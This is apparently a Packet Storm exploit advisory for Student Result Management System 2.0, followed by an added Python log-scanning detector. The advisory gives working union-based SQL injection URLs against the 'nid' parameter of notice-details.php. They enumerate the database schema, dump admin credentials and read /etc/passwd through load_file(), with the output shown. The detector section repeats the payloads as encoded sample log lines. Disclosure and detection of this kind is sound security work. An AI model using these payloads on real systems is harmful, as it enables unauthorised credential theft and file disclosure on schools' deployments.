📄 Student Result Management System 2.0 SQL Injection / Local File Inclusion

🗓️ 22 Aug 2025 | Reported by Mehmet Can Kadıoğlu | Type: packetstorm | 🔗 packetstorm.news

Unauthenticated SQL injection and local file inclusion in Student Result Management System 2.0; the PoC reads /etc/passwd.

Code
    # Exploit Title: Student Result Management System v2.0 Unauthenticated SQL Injection / Local File Inclusion
    # Date: 2025-08-22
    # Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
    # Vendor: https://phpgurukul.com/student-result-management-system/
    # Demo Site: http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/
    # Tested on: Arch Linux
    # CVE: N/A
    
    PoC:
    Open any notice on the notice board; the 'nid' parameter of notice-details.php is vulnerable to union-based SQL injection.

    1- get version information

    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,version(),3,4-- -

    10.11.7-MariaDB-4

    2- get databases on the server

    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata-- -

    information_schema
    srms

    3- get tables in the srms database

    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema='srms'-- -

    admin
    tblnotice
    tblstudents

    4- get columns in table admin

    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='admin'-- -

    UserName
    Password

    5- dump data

    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION ALL SELECT 1,concat(UserName,":",Password),3,4 FROM srms.admin-- -

    admin:f925916e[REDACTED]533251

    6- get local file (/etc/passwd)

    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1' UNION SELECT 1,load_file('/etc/passwd'),3,4 FROM srms.admin-- -
    
    root:x:0:0:root:/root:/usr/bin/zsh
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ....
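
Detection logic for the requests shown in the PoC above, added here as an example and not part of the original advisory: it scans web access logs for `notice-details.php` requests whose `nid` is not a plain integer and tags which PoC stage the value resembles. It assumes legitimate `nid` values are numeric IDs and that logs use the Apache/nginx combined format; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP, request target and status from an Apache/nginx "combined" log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Patterns taken from the PoC stages, matched after URL-decoding and lowercasing.
STAGES = [
    ("union-select", re.compile(r"union\s+(all\s+)?select")),
    ("schema-enumeration", re.compile(r"information_schema")),
    ("file-read", re.compile(r"load_file\s*\(")),
]

def classify_nid(value):
    """Return [] for a plain integer nid, else tags describing the anomaly."""
    if re.fullmatch(r"\d{1,10}", value):   # assumption: real notice IDs are integers
        return []
    lowered = value.lower()
    return ["non-numeric-nid"] + [name for name, rx in STAGES if rx.search(lowered)]

def scan(lines):
    """Return (client_ip, status, tags) for suspicious notice-details.php requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/notice-details.php"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space
        for value in parse_qs(url.query, keep_blank_values=True).get("nid", []):
            tags = classify_nid(value)
            if tags:
                findings.append((m["ip"], int(m["status"]), tags))
    return findings

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Aug/2025:10:00:01 +0000] "GET /srms/notice-details.php?nid=3 HTTP/1.1" 200 2113 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Aug/2025:10:02:11 +0000] "GET /srms/notice-details.php?nid=1%27%20UNION%20SELECT%201,version(),3,4--%20- HTTP/1.1" 200 2140 "-" "curl/8.5"',
    '203.0.113.9 - - [22/Aug/2025:10:02:40 +0000] "GET /srms/notice-details.php?nid=1%27+UNION+SELECT+1,table_name,3,4+FROM+information_schema.tables+WHERE+table_schema=%27srms%27--+- HTTP/1.1" 200 2190 "-" "curl/8.5"',
    '203.0.113.9 - - [22/Aug/2025:10:03:05 +0000] "GET /srms/notice-details.php?nid=1%27%20UNION%20SELECT%201,load_file(%27/etc/passwd%27),3,4%20FROM%20srms.admin--%20- HTTP/1.1" 200 4022 "-" "curl/8.5"',
]

if __name__ == "__main__":
    for ip, status, tags in scan(SAMPLE_LOG):
        print(ip, status, ",".join(tags))
```

A `file-read` hit that returns HTTP 200 is worth checking against the database account's privileges, since `load_file()` only returns data when that account holds the FILE privilege.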
